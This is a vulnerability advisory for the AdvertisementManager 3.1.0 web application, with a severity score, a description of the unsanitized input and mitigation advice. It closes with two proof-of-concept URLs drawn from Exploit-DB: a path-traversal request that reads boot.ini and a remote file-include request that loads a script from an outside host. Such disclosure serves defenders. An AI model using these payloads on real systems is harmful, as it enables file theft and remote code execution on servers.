AdvertisementManager local and remote file-include vulnerabilities

vendor:

AdvertisementManager

by:

indoushka

7.5

CVSS

HIGH

Local and remote file-include vulnerabilities

CWE

Product Name: AdvertisementManager

Affected Version From: 3.1.2000

Affected Version To:

Patch Exists: No

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

AdvertisementManager local and remote file-include vulnerabilities

The AdvertisementManager application fails to sufficiently sanitize user-supplied input, leading to local and remote file-include vulnerabilities. Exploiting these vulnerabilities may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer.

Mitigation:

Proper input validation and sanitization should be implemented to prevent file-include vulnerabilities. Regularly updating the AdvertisementManager application to the latest version is also recommended.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/44165/info

AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.

AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?